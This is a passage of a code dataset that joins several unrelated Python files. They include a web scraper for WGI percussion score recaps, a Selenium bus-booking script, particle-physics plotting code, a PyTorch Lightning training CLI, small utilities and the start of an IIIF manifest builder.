**kwargs, file=log)\n log.close()\n\n def _print_nothing(self, *args, **kwargs):\n pass\n\n # Data loader functionality\n from ._Data import (Set_Default_Load_Params,\n _make_load_params,\n _get_data_file_cnt,\n Load_Name_Map,\n Load_Data,\n Load_Data_Files,\n Load_Targets,\n _proc_target,\n _print_loaded_targets,\n Load_Covars,\n _proc_covar,\n Load_Strat,\n _proc_strat,\n Load_Exclusions,\n Load_Inclusions,\n Drop_Data_Cols,\n _drop_data_cols,\n Filter_Data_Cols,\n Filter_Data_Files_Cols,\n Proc_Data_Unique_Cols,\n _proc_data_unique_cols,\n Drop_Data_Duplicates,\n Binarize_Target,\n _proc_threshold,\n Binarize_Covar,\n Get_Overlapping_Subjects,\n Clear_Name_Map,\n Clear_Data,\n Clear_Covars,\n Clear_Targets,\n Clear_Strat,\n Clear_Exclusions,\n Clear_Inclusions,\n Get_Nan_Subjects,\n _get_targets_key,\n _load_datasets,\n _load_user_passed,\n _load_dataset,\n _common_load,\n _load,\n _set_overlap,\n _merge_existing,\n _proc_df,\n _load_set_of_subjects,\n _process_subject_name,\n _drop_na,\n _filter_by_eventname,\n _show_na_info,\n _drop_excluded,\n _drop_included,\n _filter_excluded,\n _filter_included,\n _get_overlapping_subjects,\n Prepare_All_Data,\n _get_cat_keys,\n _set_data_scopes,\n _get_base_targets_names,\n _get_covar_scopes)\n\n # Update loader docstrings\n Load_Name_Map.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Load_Name_Map)\n Load_Data.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Load_Data)\n Load_Data_Files.__doc__ =\\\n get_new_docstring(Load_Data, Load_Data_Files)\n Load_Targets.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Load_Targets)\n Load_Covars.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Load_Covars)\n Load_Strat.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Load_Strat)\n Filter_Data_Cols.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Filter_Data_Cols)\n Proc_Data_Unique_Cols.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Proc_Data_Unique_Cols)\n Drop_Data_Duplicates.__doc__ =\\\n get_new_docstring(Set_Default_Load_Params, Drop_Data_Duplicates)\n\n # Validation / CV funcationality\n from ._Validation import (Define_Validation_Strategy,\n Train_Test_Split,\n _add_strat_u_name,\n _get_info_on)\n\n # Machine Learning functionality\n from ._ML import (Set_Default_ML_Verbosity,\n _ML_print,\n Evaluate,\n Test,\n _premodel_check,\n _preproc_model_pipeline,\n _preproc_problem_spec,\n _get_split_vals,\n _get_subjects_to_use,\n _init_model,\n _handle_scores,\n _print_summary_score,\n _add_to_scores,\n _save_results)\n\n # Fill Evaluate and Test's docstring\n # Evaluate.__doc__ = get_new_docstring(Set_Default_ML_Params, Evaluate)\n # Test.__doc__ = get_new_docstring(Evaluate, Test)\n\n from ._Plotting import (_plot,\n _proc_subjects,\n Show_Data_Dist,\n _input_targets,\n _input_covars,\n _input_strat,\n Show_Targets_Dist,\n Show_Covars_Dist,\n Show_Strat_Dist,\n _get_single_df,\n _show_single_dist,\n _get_cat_display_df,\n _show_dist,\n _display_df,\n _get_top_global,\n Plot_Global_Feat_Importances,\n _plot_multiclass_global_feat_importances,\n _plot_global_feat_importances,\n Plot_Local_Feat_Importances,\n _plot_shap_summary)\n\n from ._Tables import (Save_Table,\n _get_single_dfs,\n _get_table_contents,\n _get_group_titles)\n","sub_path":"ABCD_ML/main/ABCD_ML.py","file_name":"ABCD_ML.py","file_ext":"py","file_size_in_byte":19330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547943538","text":"# The goal of this python script is to create a csv datafile from wgi recap documents\n\n# TODO: Find a way to get information without being so reliant on specific tag identification\n\n\nimport os # For __file__\nimport time # For sleep\nimport requests\nimport re # For regex\nimport pandas as pd\nfrom bs4 import BeautifulSoup # To read html docs\n\ndef parse_recap(link, read_type):\n \"\"\"\n Returns a dataframe containing score information for each ensemble\n \"\"\"\n\n # Conditionally create the soup object from web site or from local file\n x = read_type\n\n if (x == \"LOCAL\"):\n recap_soup = BeautifulSoup(open(link), 'html.parser')\n elif (x == \"WEB\"):\n recap_soup = BeautifulSoup(requests.get(link).text, 'html.parser')\n\n\n # Find div tags with style attributes using regex (this is a very bad way to do this)\n title_smash = []\n for tag in recap_soup.find_all(\"div\", attrs={'style':re.compile(r\".*\")}):\n print(tag.string)\n\n if (tag.string is None):\n title_smash.append(\"\")\n elif (len(tag.string) != 0):\n title_smash.append(tag.string)\n\n event_description = ''.join(title_smash)\n\n # Find each individual table\n recap_soup = recap_soup.find_all(\"table\", style=\"border-bottom: solid 1px #000; margin: 10px auto 0px auto;\")\n\n # Create empty list for all table information\n all_info = []\n\n # Get information for each individual table\n for table in recap_soup:\n\n # Get relevant information from each indivual table\n ensemble_names = [ensemble.text for ensemble in table.find_all(\"td\", \"content topBorder rightBorderDouble\")]\n all_scores = [score.text for score in table.find_all(\"td\", \"content score\")]\n judge_names = [judge.text for judge in table.find_all(\"td\", \"content topBorder rightBorder header subcaptionTotal\")]\n captions = [caption.text for caption in table.find_all(\"td\", \"content rightBorder topBorder header captionTotal\")]\n which_class = [score_class.text for score_class in table.find_all(\"td\", style=\"text-align: center; padding: 2px; font-weight: bold; font-size: 14px;\")]\n num_ensembles = len(ensemble_names)\n\n # Handle weird judge tags\n if (len(judge_names) == 0):\n judge_names = [judge.text for judge in table.find_all(\"td\", \"content topBorder rightBorder header subcaptionTotal \")]\n\n\n # First get the ratio of judges - 1 to captions\n ratio = (len(judge_names) - 1) / (len(captions) - 1)\n\n if ratio == 1:\n check = ((len(judge_names) - 1)*2) + (len(captions) - 1) + 3\n elif ratio == 2:\n check = ((len(judge_names) - 1)*3) + (len(captions) - 1) + 4\n\n print(\"Mod check: \" + str(check))\n\n # Pack everything together\n table_information = (ensemble_names, all_scores, judge_names, captions, num_ensembles, which_class, check)\n\n # Append to master list\n all_info.append(table_information)\n\n\n anthonys_greatest_accomplishment = pd.DataFrame()\n\n # Restructure raw score stream\n # Group raw data stream by number of columns in the table (32 is hardcoded) into separate lists\n for table in all_info:\n i = 1\n master_list = []\n sublist = []\n\n check_width = table[6]\n\n # Group scores by table width (check_width)\n for x in table[1]: # Point to score information\n sublist.append(x)\n\n if (i % check_width == 0):\n master_list.append(sublist)\n i = 1\n sublist = []\n else:\n i = i + 1\n\n df = pd.DataFrame(master_list)\n\n df[\"Ensemble\"] = table[0] # Add ensembles to df\n df[\"Class\"] = table[5][0] # table[5] gives returns a list, access its first element\n df[\"Event_Name\"] = event_description\n\n anthonys_greatest_accomplishment = anthonys_greatest_accomplishment.append(df)\n\n return anthonys_greatest_accomplishment\n\n\n# Recap link for 2018\n# https://www.wgi.org/percussion/2018-perc-scores/\n\n# Recap link for 2017\n# https://www.wgi.org/2017-percussion-scores/\n\n# Recap links for MCGC (lots of years)\n# https://www.mcgc.net/scores\n\n# Recap links for California (lots of years)\n# https://sc-pa.org/\n\n\n# Link used to create the intial version of the recap reader\noriginal_link = \"https://recaps.competitionsuite.com/dcdb1a72-f30b-413a-9311-15b8c600138c.htm\"\n\n# Local versions of original_link\nfile_location = os.path.dirname(__file__) + \"/the_holy_file.html\"\nsecond_file_location = os.path.dirname(__file__) + \"/secondary_recap.html\"\n\n# Different recap from WGI's website\ntest_link = \"https://recaps.competitionsuite.com/c06aa0b9-500e-4ab4-9960-fb0e04e103a1.htm\"\n\n# Recap from MCGC (Michigan Circuit)\nmcgc_link = \"https://recaps.competitionsuite.com/904e9141-55b7-45f9-acc8-778fcf83d208.htm\"\n\n# Recap from SCPA (California Circuit)\ncali_link = \"https://recaps.competitionsuite.com/9dbe02e5-8099-4487-b336-ad0969b9607c.htm\"\n\n\n# Point to a web link\n# goodies = parse_recap(cali_link, \"WEB\")\n\n# Point to a local file\n#goodies = parse_recap(file_location, \"LOCAL\")[1]\n\n# Works fine\n#my_df = parse_recap(file_location, \"LOCAL\")\n#print(my_df)\n\n# Works fine\n#test_df = parse_recap(second_file_location, \"LOCAL\")\n#print(test_df)\n\nonline_df = parse_recap(test_link, \"WEB\")\nprint(online_df)\n\n# Write to csv\nonline_df.to_csv(\"output_9-24-18.csv\")\n","sub_path":"python/Old Stuff/get_recaps/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"150418495","text":"import hand\nimport calculate\n\ndef check_input(deal):\n\n acceptable_values = list(range(2, 11))\n acceptable_values.extend([\"A\", \"J\", \"Q\", \"K\"])\n acceptable_values = [str(val) for val in acceptable_values]\n acceptable_suits = [\"D\", \"C\", \"S\", \"H\"]\n\n clean_deal = deal.replace(\", \", \",\").replace(\" \", \",\").replace(\",,\", \",\")\n print(f'Your entries: {clean_deal.split(\",\")}')\n print(clean_deal)\n clean_deal = [item for item in clean_deal.split(\",\") if item != \"\"]\n print(clean_deal)\n is_valid = True\n\n for item in clean_deal:\n if \"-\" not in item:\n print(f\"Invalid Format: {item}\")\n is_valid = False\n else:\n if item.split(\"-\")[0] not in acceptable_values:\n print(f\"Invalid Format: {item} (Unknown card value)\")\n is_valid = False\n elif item.split(\"-\")[-1] not in acceptable_suits:\n print(f\"Invalid Format: {item} (Unknown suit)\")\n is_valid = False\n\n return is_valid\n\n\ndef main(arglist):\n\n deal = \",\".join(arglist)\n\n if check_input(deal) != True:\n print(\"Exiting\")\n sys.exit()\n\n player_hand = hand.Hand(deal)\n\n calculate.score_hand(player_hand)\n\n\nif __name__ == \"__main__\":\n import sys\n\n main(sys.argv[1:])\n","sub_path":"cribbage-counsel.py","file_name":"cribbage-counsel.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460166339","text":"import unittest\nfrom adder import Adder\n\n\nclass TestBob(unittest.TestCase):\n\n def test_create_adder(self):\n adder = Adder()\n\n def test_increment(self):\n adder = Adder()\n self.assertEqual(adder.increment(3), 4)\n\n \nif __name__=='__main__':\n unittest.main(verbosity=3)\n","sub_path":"app/test_adder.py","file_name":"test_adder.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454497407","text":"\"\"\"\nThis script will rebuild the database from scratch. It should run only once during production\nand many times during development.\n\"\"\"\n\nimport logging\nfrom lib.sqlitestore import DataStore\nfrom lib import my_env\n\n\ndef main():\n cfg = my_env.init_env(\"convert_protege\", __file__)\n ds = DataStore(cfg)\n ds.remove_tables()\n ds.create_tables()\n logging.info('End Application')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/build_database.py","file_name":"build_database.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"145909597","text":"import numpy as np\nimport pandas as pd\nimport matplotlib\nmatplotlib.use('pdf')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\n# histograms\n'''\nfilenames = {\n #\"WW\": \"BGHToWW_gru_Yhat.npy\",\n #\"ZZ\": \"BGHToZZ_gru_Yhat.npy\"\n \"WW\": \"WW_N2.npy\",\n \"ZZ\": \"ZZ_N2.npy\"\n #\"Dense\": \"DensetW.npy\",\n #\"GRU\": \"GRUtW.npy\"\n #\"WW\": \"ww_j_pt.npy\",\n #\"ZZ\": \"zz_j_pt.npy\"\n #\"Jeff\": \"jeff_weights_bkg.npy\",\n #\"DAZSLE\": \"dazsle_weights_bkg.npy\"\n #\"WW\": \"ww_j_pt.npy\",\n #\"ZZ Unweighted\": \"zz_j_pt.npy\",\n #\"ZZ Jeff\": \"zz_j_pt.npy\",\n #\"ZZ DAZSLE\": \"zz_j_pt.npy\"\n}\n'''\n\ninf_dir = \"inference/\"\n\nsamples = [\"BGHToWW\", \"BGHToZZ\"]\nnevts = 1200000\n\n# files to use for N2, GRU, etc\nN2 = {\n \"WW\": \"BGHToWW_ss.npy\",\n \"ZZ\": \"BGHToZZ_ss.npy\",\n \"QCD\": \"QCD_ss.npy\"\n}\n\nY = {\n \"WW\": \"BGHToWW_Y_all.npy\",\n \"ZZ\": \"BGHToZZ_Y_all.npy\"\n}\n\nGRU = {\n \"WW\": \"BGHToWW_gru_Yhat_all.npy\",\n \"ZZ\": \"BGHToZZ_gru_Yhat_all.npy\",\n \"QCD\": \"QCD_gru_Yhat_all.npy\"\n}\n\nDNN = {\n \"WW\": \"BGHToWW_dnn_Yhat_all.npy\",\n \"ZZ\": \"BGHToZZ_dnn_Yhat_all.npy\",\n \"QCD\": \"QCD_dnn_Yhat_all.npy\"\n}\n\nj_pt = {\n \"WW\": \"WW_j_pt.npy\",\n \"ZZ\": \"ZZ_j_pt.npy\",\n \"QCD\": \"QCD_j_pt.npy\"\n}\n\nj_msd = {\n \"WW\": \"WW_j_msd.npy\",\n \"ZZ\": \"ZZ_j_msd.npy\",\n \"QCD\": \"QCD_j_msd.npy\"\n}\n\nweights = {\n \"WW\": np.load(\"dazsle_weights_sig.npy\"),\n \"ZZ\": np.load(\"dazsle_weights_bkg.npy\")\n} \n\n\n\nout = PdfPages(\"out.pdf\")\n\ndef make_arrays(filenames):\n arrays = {}\n basedir = \"\"\n for k, v in filenames.iteritems():\n if 'Y' in v: basedir = inf_dir\n try:\n arrays[k] = np.load(basedir+v)[:, :1]\n except:\n arrays[k] = np.load(basedir+v)\n #print type(arrays[k]), arrays[k]\n\n return arrays\n\ndef make_hist(filenames, weight=False, title=\"\", xlabel=\"\", min_=None, max_=None):\n plt.figure(figsize=(6, 6), dpi=100)\n plt.title(title)\n plt.xlabel(xlabel)\n\n arrays = make_arrays(filenames)\n if min_ is None: min_ = min([min(v) for v in arrays.itervalues()])\n if max_ is None: max_ = max([max(v) for v in arrays.itervalues()])\n bins = np.linspace(min_, max_, 100)\n\n for k, v in arrays.iteritems():\n #print k\n #print \"v shape min and max: \", v.shape, '\\n', v.min(), '\\n', v.max()\n if weight:\n w = weights[k]\n #print \"using weights: \", w, len(w)\n n = min(len(w), v.shape[0])\n v = v[:n]\n w = w[:n]\n plt.hist(v, bins=bins, density=True, label=k, histtype='step', weights=w)\n else:\n plt.hist(v[:nevts], bins=bins, density=True, label=k, histtype='step')\n\n \n ''' # plot weighted vs unweighted\n for k, v in arrays.iteritems():\n plt.hist(v, bins=bins, density=True, label='weighted', histtype='step', weights=weights[k])\n plt.hist(v, bins=bins, density=True, label='unweighted', histtype='step')\n '''\n \n plt.legend(loc='upper right')\n \n PdfPages.savefig(out, dpi=100)\n return\n\ndef make_hist_from_arrays(arrays, weight=False, title=\"\", xlabel=\"\", min_=None, max_=None):\n plt.figure(figsize=(6, 6), dpi=100)\n plt.title(title)\n plt.xlabel(xlabel)\n\n if min_ is None: min_ = min([min(v) for v in arrays.itervalues()])\n if max_ is None: max_ = max([max(v) for v in arrays.itervalues()])\n bins = np.linspace(min_, max_, 100)\n\n for k, v in arrays.iteritems():\n #print k\n #print \"v shape min and max: \", v.shape, '\\n', v.min(), '\\n', v.max()\n if weight:\n w = weights[k][:v.shape[0]]\n #print \"using weights: \", w, len(w)\n plt.hist(v, bins=bins, density=True, label=\"Response > {}\".format(k), histtype='step', weights=w)\n else:\n plt.hist(v, bins=bins, density=True, label=\"Response > {}\".format(k), histtype='step')\n \n plt.legend(loc='upper right')\n \n PdfPages.savefig(out, dpi=100)\n return\n\n# roc curve\nfrom sklearn.metrics import roc_curve\n\nys = [np.load(inf_dir+name+\"_Y_all.npy\") for name in samples]\ny = np.concatenate(ys)\ndnn_yhat = np.concatenate([v for v in make_arrays(DNN).itervalues()])\ngru_yhat = np.concatenate([v for v in make_arrays(GRU).itervalues()])\n\ndef make_roc():\n\n plt.figure(figsize=(6, 6), dpi=100)\n plt.title(\"ROC Curve\")\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n\n fpr_dnn, tpr_dnn, _ = roc_curve(y.argmax(axis=1), dnn_yhat[:, :1])\n fpr_gru, tpr_gru, _ = roc_curve(y.argmax(axis=1), gru_yhat[:, :1])\n\n plt.plot([0,1], [0,1], 'k--')\n plt.plot(fpr_dnn, tpr_dnn, label='DNN')\n plt.plot(fpr_gru, tpr_gru, label='GRU')\n\n plt.legend(loc='best')\n PdfPages.savefig(out, dpi=100)\n \n return\n\ndef make_msd_arrays(yhats, k, min_=0, max_=.8, n=5):\n try:\n yhat = yhats[k][:,0]\n except:\n yhat = yhats[k]\n msd = make_arrays(j_msd)[k]\n msds = {}\n for i in np.linspace(min_, max_, n):\n mask = np.where(yhat > i)[0]\n msds[i] = msd[mask]\n return msds\n\n#make_hist(N2, weight=True, title=\"N2\", xlabel=\"N2\")\n#make_hist(DNN, weight=True, title=\"DNN\", xlabel=\"Response\")\n#make_hist(GRU, weight=True, title=\"GRU\", xlabel=\"Response\")\n#make_roc()\n\ndef make_report():\n make_hist(j_pt, weight=False, title=\"j_pt (unweighted)\", xlabel=\"j_pt\")\n make_hist(j_pt, weight=True, title=\"j_pt (weighted)\", xlabel=\"j_pt\")\n make_hist(j_msd, weight=False, title=\"j_msd (unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n make_hist(j_msd, weight=True, title=\"j_msd (weighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n\n WW_DNN_j_msds = make_msd_arrays(make_arrays(DNN), \"WW\")\n WW_GRU_j_msds = make_msd_arrays(make_arrays(GRU), \"WW\")\n ZZ_DNN_j_msds = make_msd_arrays(make_arrays(DNN), \"ZZ\")\n ZZ_GRU_j_msds = make_msd_arrays(make_arrays(GRU), \"ZZ\")\n\n make_hist_from_arrays(WW_DNN_j_msds, weight=False, title=\"WW j_msd filtered by DNN Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n make_hist_from_arrays(WW_GRU_j_msds, weight=False, title=\"WW j_msd filtered by GRU Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n make_hist_from_arrays(ZZ_DNN_j_msds, weight=False, title=\"ZZ j_msd filtered by DNN Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n make_hist_from_arrays(ZZ_GRU_j_msds, weight=False, title=\"ZZ j_msd filtered by GRU Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n\n\ndef make_QCD_report():\n make_hist(j_pt, weight=False, title=\"j_pt (unweighted)\", xlabel=\"j_pt\")\n make_hist(j_msd, weight=False, title=\"j_msd (unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n\n QCD_DNN_j_msds = make_msd_arrays(make_arrays(DNN), \"QCD\", min_=0.4, max_=0.8, n=5)\n QCD_GRU_j_msds = make_msd_arrays(make_arrays(GRU), \"QCD\", min_=0.4, max_=0.8, n=5)\n\n make_hist_from_arrays(QCD_DNN_j_msds, weight=False, title=\"QCD j_msd filtered by DNN Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n make_hist_from_arrays(QCD_GRU_j_msds, weight=False, title=\"QCD j_msd filtered by GRU Response (Unweighted)\", xlabel=\"j_msd\", min_=0, max_=200)\n\n \n#make_report()\nmake_QCD_report()\n\nout.close()\n\n\n\n\n\n\n\n'''\ndazsle_weights = np.load(basedir+\"dazsle_weights_ordered.npy\")\ni = len(dazsle_weights) - len(arrays[\"ZZ Unweighted\"])\n\nweights = {\n \"WW\": np.ones(len(arrays[\"WW\"])),\n \"ZZ Unweighted\": np.ones(len(arrays[\"ZZ Unweighted\"])),\n \"ZZ Jeff\": np.load(basedir+\"jeff_weights_bkg.npy\"),\n \"ZZ DAZSLE\": dazsle_weights[i:]\n}'''\n","sub_path":"train/dazsle-tagger/mass_sculpt_plots.py","file_name":"mass_sculpt_plots.py","file_ext":"py","file_size_in_byte":7483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193903942","text":"import zipfile\nimport glob\nimport os.path\n\ndef zipdir(fn, d = \".\"):\n (upper_dir, base_dir) = os.path.split(d)\n os.chdir(upper_dir) \n files = glob.glob(base_dir+\"/*\") \n zippable_files = []\n for f in files:\n if (os.path.isfile(f)): \n zippable_files.append(f) \n zf = zipfile.ZipFile(fn, \"w\", zipfile.ZIP_DEFLATED)\n for fn_to_archive in zippable_files:\n zf.write(fn_to_archive)\n zf.close()\n","sub_path":"Exercises/Archives_Homework/src/zipdir.py","file_name":"zipdir.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546141199","text":"\n'''Import books.csv into books table.'''\nimport csv\nimport os\nfrom sqlalchemy import create_engine, text\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\n# Set up database connection\nengine = create_engine(os.getenv(\"DATABASE_URL\"), \n connect_args={\"application_name\":\"application.py\"}, \n echo=True)\ndb = scoped_session(sessionmaker(bind=engine))\n\n\ndef main():\n with open(\"books.csv\", \"r\") as books:\n reader = csv.DictReader(books, fieldnames=['isbn', 'title', 'author', 'year'])\n # Skip header\n next(reader)\n # Insert CSV data into table\n statement = text(\"INSERT INTO books(isbn, title, author, year) VALUES(:isbn, :title, :author, :year)\")\n for row in reader:\n row['year'] = int(row['year'])\n db.execute(statement, row)\n db.commit()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24771513","text":"import pytorch_lightning as pl\nfrom pytorch_lightning import callbacks\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom pytorch_lightning.callbacks.model_checkpoint import ModelCheckpoint\n\nfrom utils.load_cfg import load_cfg\nfrom utils.prepare_seed import prepare_seed\n\nimport click\n\nfrom agents import *\n\nfrom loaders import *\n\n@click.command()\n@click.option('--config', '-cfg', required=True)\ndef cli(config):\n cfg = load_cfg(config)\n prepare_seed(cfg.exp_cfg.seed)\n agent = eval(cfg.agent)(cfg.agent_cfg)\n loaders = eval(cfg.data_loader.name)(**cfg.data_loader.kwargs)\n checkpoint_callback = ModelCheckpoint(\n dirpath=cfg.checkpoint_dir,\n **cfg.model_checkpoint\n )\n logger = TensorBoardLogger(\n name=cfg.exp_name,\n **cfg.logger\n )\n\n trainer = pl.Trainer(\n callbacks=[checkpoint_callback],\n default_root_dir=cfg.out_dir,\n logger=logger,\n **cfg.trainer\n )\n\n trainer.fit(\n model=agent,\n train_dataloader=loaders.train_loader,\n val_dataloaders=loaders.test_loader\n )\n\nif __name__ == '__main__':\n # cli(['-cfg', 'configs/iwslt15_transformer.yaml'])\n # cli(['-cfg', 'configs/fashion_mnist_mlp.yaml'])\n cli()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165677772","text":"from queue import Empty\nfrom selenium import webdriver\nfrom datetime import date\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport pyttsx3\nfrom Identify_query import Recognize_voice\n\n\ndef bus_auto(x_var):\n engine = pyttsx3.init()\n import time\n driver = webdriver.Chrome(\"C:\\Final Year Project\\Chrome Driver\\chromedriver.exe\")\n driver.maximize_window()\n url = \"https://www.redbus.in/\"\n driver.get(url)\n time.sleep(1)\n # retrieve data from user data file\n driver.find_element_by_id('src').send_keys(x_var[0])\n time.sleep(3)\n driver.find_element_by_id('dest').send_keys(x_var[1])\n time.sleep(3)\n driver.find_element_by_id('onward_cal').send_keys('0')\n\n def month_to_number(string):\n m = {\n 'jan': 1,\n 'feb': 2,\n 'mar': 3,\n 'apr': 4,\n 'may': 5,\n 'jun': 6,\n 'jul': 7,\n 'aug': 8,\n 'sep': 9,\n 'oct': 10,\n 'nov': 11,\n 'dec': 12\n }\n s = string.strip()[:3].lower()\n\n try:\n out = m[s]\n return out\n except:\n raise ValueError('Not a month')\n\n x = date.today()\n u_mm = x_var[4]\n mm = x.strftime(\"%B\")\n _u_mm = month_to_number(u_mm)\n _mm = month_to_number(mm)\n dd = x_var[3]\n flag = _u_mm - _mm\n r_dd = x_var[7]\n r_mm = x_var[8]\n r_yyyy = x_var[9]\n\n while flag > 0:\n try:\n d = driver.find_element_by_xpath(\n \"//div[@id='rb-calendar_onward_cal']/table/tbody/tr/td[@class='next']\").click()\n flag -= 1\n except:\n raise Empty(\"Please provide valid month\")\n\n driver.find_element_by_xpath(\"//div[@id='rb-calendar_onward_cal']/table/tbody/tr/td[text()=\" + dd + \"]\").click()\n driver.find_element_by_xpath(\"//button[@id='search_btn']\").click()\n time.sleep(10)\n p = driver.find_element_by_xpath(\"//div[text()='View Buses']\")\n if p:\n p.click()\n else:\n p = 0\n\n content = driver.page_source\n soup = BeautifulSoup(content, \"html.parser\")\n info = soup.find_all('div', attrs={'class': 'clearfix row-one'})\n print(len(info))\n name_ = []\n tpe_ = []\n price_ = []\n time_ = []\n for a in info:\n name = a.find('div', attrs={'class': 'travels lh-24 f-bold d-color'})\n name_.append(name.text)\n tpe = a.find('div', attrs={'class': 'bus-type f-12 m-top-16 l-color'})\n tpe_.append(tpe.text)\n price = a.find('div', attrs={'class': 'seat-fare'})\n price_with_text = price.text\n price_without_text = res = [int(i) for i in price_with_text.split() if i.isdigit()]\n price_.append(price_without_text[0])\n time = a.find('div', attrs={'class': 'dp-time f-19 d-color f-bold'})\n time_.append(time.text)\n\n df = pd.DataFrame({'Travels Name': name_, 'Bus Type': tpe_, 'Price': price_, 'Time': time_})\n df.to_csv('products.csv', index=False, encoding='utf-8')\n\n driver.close()\n\n csv_data = pd.read_csv('products.csv')\n all_ele = []\n for row in csv_data.index:\n all_ele.append(csv_data['Price'][row])\n\n all_ele_len = len(all_ele)\n average_price = sum(all_ele) / all_ele_len\n print(average_price)\n\n engine.say(\"Now tell me, Which type of Bus you like to book?\")\n engine.say(\"We have some types, and these are: R T C means Government buses, Shivshahi buses, Shivneri buses, \"\n \"Private buses, or you can book sleeper bus \")\n engine.runAndWait()\n b_type = Recognize_voice()\n engine.say(\"at what time you like to book\")\n engine.runAndWait()\n booking_time = Recognize_voice()\n bad_stm = ['at', 'on', 'in']\n for i in bad_stm:\n booking_time = booking_time.replace(i, '')\n\n # making data frame from csv file\n data = pd.read_csv(\"products.csv\", delimiter=',')\n\n # replacing blank spaces with '_'\n data.columns = [column.replace(\" \", \"_\") for column in data.columns]\n\n def closest(lst, K):\n return lst[min(range(len(lst)), key=lambda i: abs(lst[i] - K))]\n\n # time filter\n\n # find actual price from average price\n K = average_price\n actual_price_close_to_avg_price = closest(all_ele, K)\n print(actual_price_close_to_avg_price)\n\n if 'shivshahi bus' in b_type or 'shivshahi buses' in b_type or 'shivshahi' in b_type:\n # filtering with query method for Shivshahi buses\n # data.query('Bus_Type == \"SHIVSHAHI\"', inplace=True)\n\n ele_having_shivshahi = data[data.Bus_Type == 'SHIVSHAHI']\n minValue = ele_having_shivshahi['Price'].min()\n time_of_that_bus = ele_having_shivshahi.loc[ele_having_shivshahi['Price'] == minValue, 'Time'].iloc[0]\n print(ele_having_shivshahi)\n print(minValue)\n print(time_of_that_bus)\n engine.say(\"I found one bus for you at lowest price, at \" + str(minValue))\n engine.say(\"and Bus time is \" + str(time_of_that_bus))\n engine.runAndWait()\n bus_name_at_user_time = ele_having_shivshahi.loc[ele_having_shivshahi['Time'] == booking_time, 'Travels_Name'].iloc[0]\n print(bus_name_at_user_time)\n","sub_path":"bus_automate.py","file_name":"bus_automate.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498468183","text":"# -*- coding: utf-8 -*-\nfrom subprocess import check_output\nimport glob\nimport sys\nimport os \nfrom IIIFpres import iiifpapi3\nfrom itertools import cycle\n#folder = sys.argv[1]\nfolder = r\"/Users/univr/Pictures/41\"\nromconv = {1: 'I',\n 2: 'II',\n 3: 'III',\n 4: 'IV',\n 5: 'V',\n 6: 'VI',\n 7: 'VII',\n 8: 'VIII',\n 9: 'IX',\n 10: 'X',\n 11: 'XI',\n 12: 'XII',\n 13: 'XIII',\n 14: 'XIV',\n 15: 'XV',\n 16: 'XVI',\n 17: 'XVII',\n 18: 'XVIII',\n 19: 'XIX'}\n\ntsv_datasetpath = r\"list.tsv\"\nsegnatura = 41\ndef search(segnatura):\n with open(tsv_datasetpath,'r') as f:\n header = True \n for i in f:\n records = i.split(\"\\t\")\n if header:\n h = records\n header = False\n elif records[5] == str(segnatura):\n return dict(zip(h,records))\nrecord = search(segnatura)\nsegnatura = str(segnatura)\niiifpapi3.BASE_URL = \"http://lezioni.meneghetti.univr.it\" \nmanifest = iiifpapi3.Manifest()\nmanifest.set_id(extendbase_url=[\"manifests\" ,segnatura])\nsegn = \"%s (%s)\" %(record[\"numero_del_codice\"],record[\"numerazione_araba\"])\nmanifest.add_label(\"it\",\"Manoscritto: %s\" %segn)\n\nmanifest.add_metadata(label=\"rilegatura_moderna\",value=record[\"rilegatura_moderna\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Collocazione:\",value=record[\"Collocazione\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Segnatura espressa come numero arabo:\",value=record[\"roman_converted\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Segnatura:\",value=record[\"numero_del_codice\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Antica segnatura con numero 